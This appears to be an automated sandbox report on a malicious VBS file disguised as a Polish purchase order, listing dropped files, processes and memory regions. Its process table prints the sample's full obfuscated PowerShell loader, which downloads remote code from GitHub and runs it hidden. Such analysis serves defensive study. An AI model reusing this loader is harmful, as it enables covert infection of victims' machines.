Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Nowe zam#U00f3wienie Roltop.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nml5pgt.nzl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbaf1xlq.c2b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbodl0t0.jpe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrrcenxc.0gh.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2656C979000
|
heap
|
page read and write
|
||
|
1E73B543000
|
heap
|
page read and write
|
||
|
2656CA0F000
|
heap
|
page read and write
|
||
|
1E73B710000
|
heap
|
page readonly
|
||
|
875E5FC000
|
stack
|
page read and write
|
||
|
2656AB21000
|
heap
|
page read and write
|
||
|
C179DFE000
|
stack
|
page read and write
|
||
|
7FFD9BAAA000
|
trusted library allocation
|
page read and write
|
||
|
26500118000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E73D443000
|
trusted library allocation
|
page read and write
|
||
|
27228EF7000
|
heap
|
page read and write
|
||
|
27229280000
|
heap
|
page read and write
|
||
|
1E73B490000
|
heap
|
page read and write
|
||
|
26510074000
|
trusted library allocation
|
page read and write
|
||
|
C17A1FE000
|
stack
|
page read and write
|
||
|
2656C9B5000
|
heap
|
page read and write
|
||
|
27229252000
|
heap
|
page read and write
|
||
|
7FFD9B8DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B94C000
|
trusted library allocation
|
page execute and read and write
|
||
|
875E7F9000
|
stack
|
page read and write
|
||
|
26500126000
|
trusted library allocation
|
page read and write
|
||
|
265004F0000
|
trusted library allocation
|
page read and write
|
||
|
1E73B56E000
|
heap
|
page read and write
|
||
|
1E73B5FB000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
27228F05000
|
heap
|
page read and write
|
||
|
27227395000
|
heap
|
page read and write
|
||
|
27229272000
|
heap
|
page read and write
|
||
|
2650001B000
|
trusted library allocation
|
page read and write
|
||
|
2650033D000
|
trusted library allocation
|
page read and write
|
||
|
2656CA0C000
|
heap
|
page read and write
|
||
|
2722710F000
|
heap
|
page read and write
|
||
|
1E73B530000
|
heap
|
page read and write
|
||
|
C179CFD000
|
stack
|
page read and write
|
||
|
C179EFF000
|
stack
|
page read and write
|
||
|
27227115000
|
heap
|
page read and write
|
||
|
1E755530000
|
heap
|
page read and write
|
||
|
7FFD9BAA4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
27228F02000
|
heap
|
page read and write
|
||
|
875E67E000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
2656AAC0000
|
heap
|
page read and write
|
||
|
27228FED000
|
heap
|
page read and write
|
||
|
27229015000
|
heap
|
page read and write
|
||
|
875E1CE000
|
stack
|
page read and write
|
||
|
27229298000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1E73B7C5000
|
heap
|
page read and write
|
||
|
26500123000
|
trusted library allocation
|
page read and write
|
||
|
27229263000
|
heap
|
page read and write
|
||
|
2656AA80000
|
heap
|
page read and write
|
||
|
2722927A000
|
heap
|
page read and write
|
||
|
2656C400000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
875EB7E000
|
stack
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
265004C7000
|
trusted library allocation
|
page read and write
|
||
|
2722901D000
|
heap
|
page read and write
|
||
|
2722924F000
|
heap
|
page read and write
|
||
|
27229018000
|
heap
|
page read and write
|
||
|
272292C3000
|
heap
|
page read and write
|
||
|
27228ED7000
|
heap
|
page read and write
|
||
|
2656C410000
|
heap
|
page execute and read and write
|
||
|
27228EDC000
|
heap
|
page read and write
|
||
|
1E73D4C8000
|
trusted library allocation
|
page read and write
|
||
|
27228ED5000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
27229008000
|
heap
|
page read and write
|
||
|
27228F4C000
|
heap
|
page read and write
|
||
|
1E73B572000
|
heap
|
page read and write
|
||
|
2722938C000
|
heap
|
page read and write
|
||
|
1E7555D8000
|
heap
|
page read and write
|
||
|
2656CF40000
|
heap
|
page read and write
|
||
|
27228EFB000
|
heap
|
page read and write
|
||
|
1E73B5B8000
|
heap
|
page read and write
|
||
|
27228ED2000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
27226F10000
|
heap
|
page read and write
|
||
|
26500052000
|
trusted library allocation
|
page read and write
|
||
|
2656CA05000
|
heap
|
page read and write
|
||
|
2656C426000
|
heap
|
page read and write
|
||
|
26500120000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
2656CAC0000
|
heap
|
page read and write
|
||
|
27228F20000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27228ED6000
|
heap
|
page read and write
|
||
|
1E74D427000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
27228FD0000
|
heap
|
page read and write
|
||
|
875EBFB000
|
stack
|
page read and write
|
||
|
27228F38000
|
heap
|
page read and write
|
||
|
27228F23000
|
heap
|
page read and write
|
||
|
7FFD9B8F4000
|
trusted library allocation
|
page read and write
|
||
|
272292D0000
|
heap
|
page read and write
|
||
|
27227390000
|
heap
|
page read and write
|
||
|
2722710E000
|
heap
|
page read and write
|
||
|
2656AAC4000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1E75555D000
|
heap
|
page read and write
|
||
|
1E73B621000
|
heap
|
page read and write
|
||
|
27228FDD000
|
heap
|
page read and write
|
||
|
B655DFD000
|
stack
|
page read and write
|
||
|
1E73B561000
|
heap
|
page read and write
|
||
|
7FFD9B986000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
875EA7F000
|
stack
|
page read and write
|
||
|
875E6FE000
|
stack
|
page read and write
|
||
|
27229018000
|
heap
|
page read and write
|
||
|
2650015D000
|
trusted library allocation
|
page read and write
|
||
|
27228EE9000
|
heap
|
page read and write
|
||
|
2656C9B3000
|
heap
|
page read and write
|
||
|
B655BFF000
|
stack
|
page read and write
|
||
|
2656C370000
|
heap
|
page readonly
|
||
|
C179C75000
|
stack
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
26500064000
|
trusted library allocation
|
page read and write
|
||
|
27228ED3000
|
heap
|
page read and write
|
||
|
27228ED1000
|
heap
|
page read and write
|
||
|
27228F40000
|
heap
|
page read and write
|
||
|
2656A910000
|
heap
|
page read and write
|
||
|
7FFD9B90C000
|
trusted library allocation
|
page read and write
|
||
|
27228FF8000
|
heap
|
page read and write
|
||
|
2656AA50000
|
heap
|
page read and write
|
||
|
2722904B000
|
heap
|
page read and write
|
||
|
27228F05000
|
heap
|
page read and write
|
||
|
1E74D421000
|
trusted library allocation
|
page read and write
|
||
|
2656AB0D000
|
heap
|
page read and write
|
||
|
27227010000
|
heap
|
page read and write
|
||
|
7DF4A6290000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E73D0D5000
|
heap
|
page read and write
|
||
|
27228FD4000
|
heap
|
page read and write
|
||
|
2656A9F0000
|
heap
|
page read and write
|
||
|
27228B80000
|
heap
|
page read and write
|
||
|
2650010F000
|
trusted library allocation
|
page read and write
|
||
|
C17A079000
|
stack
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
27228EE7000
|
heap
|
page read and write
|
||
|
7FFD9B8E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B98C000
|
trusted library allocation
|
page execute and read and write
|
||
|
272291BE000
|
heap
|
page read and write
|
||
|
2722900D000
|
heap
|
page read and write
|
||
|
875E18E000
|
stack
|
page read and write
|
||
|
26500373000
|
trusted library allocation
|
page read and write
|
||
|
27227199000
|
heap
|
page read and write
|
||
|
27229028000
|
heap
|
page read and write
|
||
|
875E4FF000
|
stack
|
page read and write
|
||
|
2722938C000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2656C960000
|
heap
|
page read and write
|
||
|
27228EDA000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page execute and read and write
|
||
|
875E9FE000
|
stack
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2722927E000
|
heap
|
page read and write
|
||
|
C179D7E000
|
stack
|
page read and write
|
||
|
27228FE1000
|
heap
|
page read and write
|
||
|
2656CBA0000
|
heap
|
page execute and read and write
|
||
|
27228FFD000
|
heap
|
page read and write
|
||
|
27228F4C000
|
heap
|
page read and write
|
||
|
7FFD9B9A6000
|
trusted library allocation
|
page read and write
|
||
|
2656AACC000
|
heap
|
page read and write
|
||
|
27228F4C000
|
heap
|
page read and write
|
||
|
B6557FE000
|
stack
|
page read and write
|
||
|
26500057000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
2656AB72000
|
heap
|
page read and write
|
||
|
2656C969000
|
heap
|
page read and write
|
||
|
2650009D000
|
trusted library allocation
|
page read and write
|
||
|
27229038000
|
heap
|
page read and write
|
||
|
2722927C000
|
heap
|
page read and write
|
||
|
27228F28000
|
heap
|
page read and write
|
||
|
1E73B470000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27228F23000
|
heap
|
page read and write
|
||
|
1E755710000
|
heap
|
page read and write
|
||
|
265004FA000
|
trusted library allocation
|
page read and write
|
||
|
27229298000
|
heap
|
page read and write
|
||
|
27228EE7000
|
heap
|
page read and write
|
||
|
B655FFF000
|
stack
|
page read and write
|
||
|
1E73D4A6000
|
trusted library allocation
|
page read and write
|
||
|
1E755582000
|
heap
|
page read and write
|
||
|
26500536000
|
trusted library allocation
|
page read and write
|
||
|
1E73B570000
|
heap
|
page read and write
|
||
|
27228EF1000
|
heap
|
page read and write
|
||
|
C17A27E000
|
stack
|
page read and write
|
||
|
C17A0F6000
|
stack
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
27228F3B000
|
heap
|
page read and write
|
||
|
1E73D0D0000
|
heap
|
page read and write
|
||
|
B655AFF000
|
stack
|
page read and write
|
||
|
2656C840000
|
heap
|
page read and write
|
||
|
27228F05000
|
heap
|
page read and write
|
||
|
C17A17C000
|
stack
|
page read and write
|
||
|
272270E0000
|
heap
|
page read and write
|
||
|
C179FFE000
|
stack
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
1E73D421000
|
trusted library allocation
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
27229289000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
1E73D0C0000
|
heap
|
page read and write
|
||
|
26500001000
|
trusted library allocation
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
C17A2FE000
|
stack
|
page read and write
|
||
|
1E755558000
|
heap
|
page read and write
|
||
|
27229277000
|
heap
|
page read and write
|
||
|
875E103000
|
stack
|
page read and write
|
||
|
27229044000
|
heap
|
page read and write
|
||
|
26510010000
|
trusted library allocation
|
page read and write
|
||
|
265003F3000
|
trusted library allocation
|
page read and write
|
||
|
27229274000
|
heap
|
page read and write
|
||
|
C1799EE000
|
stack
|
page read and write
|
||
|
2656C420000
|
heap
|
page read and write
|
||
|
B6560FB000
|
stack
|
page read and write
|
||
|
26500112000
|
trusted library allocation
|
page read and write
|
||
|
2722903F000
|
heap
|
page read and write
|
||
|
B6556FE000
|
stack
|
page read and write
|
||
|
27229298000
|
heap
|
page read and write
|
||
|
27228F07000
|
heap
|
page read and write
|
||
|
875E97C000
|
stack
|
page read and write
|
||
|
2722924F000
|
heap
|
page read and write
|
||
|
875E8F8000
|
stack
|
page read and write
|
||
|
27228ED0000
|
heap
|
page read and write
|
||
|
27226FF0000
|
heap
|
page read and write
|
||
|
272290C8000
|
heap
|
page read and write
|
||
|
272292D1000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
C179E7D000
|
stack
|
page read and write
|
||
|
26500942000
|
trusted library allocation
|
page read and write
|
||
|
B655EFE000
|
stack
|
page read and write
|
||
|
272271A9000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
875E57E000
|
stack
|
page read and write
|
||
|
26500023000
|
trusted library allocation
|
page read and write
|
||
|
2656AB08000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2722924C000
|
heap
|
page read and write
|
||
|
1E73D4C4000
|
trusted library allocation
|
page read and write
|
||
|
875E47E000
|
stack
|
page read and write
|
||
|
1E73B510000
|
trusted library allocation
|
page read and write
|
||
|
1E75557E000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
27228F23000
|
heap
|
page read and write
|
||
|
272291D0000
|
heap
|
page read and write
|
||
|
1E74D431000
|
trusted library allocation
|
page read and write
|
||
|
2722902D000
|
heap
|
page read and write
|
||
|
7FFD9B9D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
B65536A000
|
stack
|
page read and write
|
||
|
2650006E000
|
trusted library allocation
|
page read and write
|
||
|
27229288000
|
heap
|
page read and write
|
||
|
27228FD1000
|
heap
|
page read and write
|
||
|
1E73D47F000
|
trusted library allocation
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
1E73B720000
|
trusted library allocation
|
page read and write
|
||
|
26510001000
|
trusted library allocation
|
page read and write
|
||
|
1E73B7C0000
|
heap
|
page read and write
|
||
|
1E74D495000
|
trusted library allocation
|
page read and write
|
||
|
875EAFE000
|
stack
|
page read and write
|
||
|
272291D1000
|
heap
|
page read and write
|
||
|
2656AA93000
|
heap
|
page read and write
|
||
|
27228ED2000
|
heap
|
page read and write
|
||
|
27228F13000
|
heap
|
page read and write
|
||
|
C179F7E000
|
stack
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
2656C340000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2656AA75000
|
heap
|
page read and write
|
||
|
27229298000
|
heap
|
page read and write
|
||
|
1E73B538000
|
heap
|
page read and write
|
||
|
1E7556E0000
|
heap
|
page execute and read and write
|
||
|
2656CBD5000
|
heap
|
page read and write
|
||
|
1E73B4D0000
|
heap
|
page read and write
|
||
|
1E7555CE000
|
heap
|
page read and write
|
||
|
B6558FE000
|
stack
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2656CAA0000
|
heap
|
page read and write
|
||
|
2722927B000
|
heap
|
page read and write
|
||
|
7FFD9BA92000
|
trusted library allocation
|
page read and write
|
||
|
27228F33000
|
heap
|
page read and write
|
||
|
27227116000
|
heap
|
page read and write
|
||
|
2656AA70000
|
heap
|
page read and write
|
||
|
27228F02000
|
heap
|
page read and write
|
||
|
27228FE4000
|
heap
|
page read and write
|
||
|
7FFD9BAD2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E755565000
|
heap
|
page read and write
|
||
|
875E77E000
|
stack
|
page read and write
|
||
|
2656CBD0000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1E73D447000
|
trusted library allocation
|
page read and write
|
||
|
1E73B62E000
|
heap
|
page read and write
|
||
|
27228ED4000
|
heap
|
page read and write
|
||
|
1E73B5B6000
|
heap
|
page read and write
|
||
|
7FFD9B8D4000
|
trusted library allocation
|
page read and write
|
||
|
2656C360000
|
trusted library allocation
|
page read and write
|
||
|
27228ED4000
|
heap
|
page read and write
|
||
|
2656C3F0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8D2000
|
trusted library allocation
|
page read and write
|
||
|
2656AAE0000
|
heap
|
page read and write
|
||
|
1E73B58E000
|
heap
|
page read and write
|
||
|
26500720000
|
trusted library allocation
|
page read and write
|
||
|
265004F6000
|
trusted library allocation
|
page read and write
|
||
|
2656AB74000
|
heap
|
page read and write
|
||
|
2656AA10000
|
heap
|
page read and write
|
||
|
2656C3F7000
|
heap
|
page execute and read and write
|
||
|
27228F18000
|
heap
|
page read and write
|
||
|
7FFD9BA85000
|
trusted library allocation
|
page read and write
|
||
|
272292C4000
|
heap
|
page read and write
|
||
|
1E73B700000
|
trusted library allocation
|
page read and write
|
||
|
875E876000
|
stack
|
page read and write
|
||
|
27228EDB000
|
heap
|
page read and write
|
||
|
272290C7000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
1E73B770000
|
heap
|
page execute and read and write
|
||
|
27227199000
|
heap
|
page read and write
|
||
|
272271AA000
|
heap
|
page read and write
|
||
|
1E73D440000
|
trusted library allocation
|
page read and write
|
||
|
26500115000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
272291BE000
|
heap
|
page read and write
|
||
|
1E73B460000
|
heap
|
page read and write
|
||
|
27229049000
|
heap
|
page read and write
|
||
|
2722711E000
|
heap
|
page read and write
|
There are 326 hidden memdumps, click here to show them.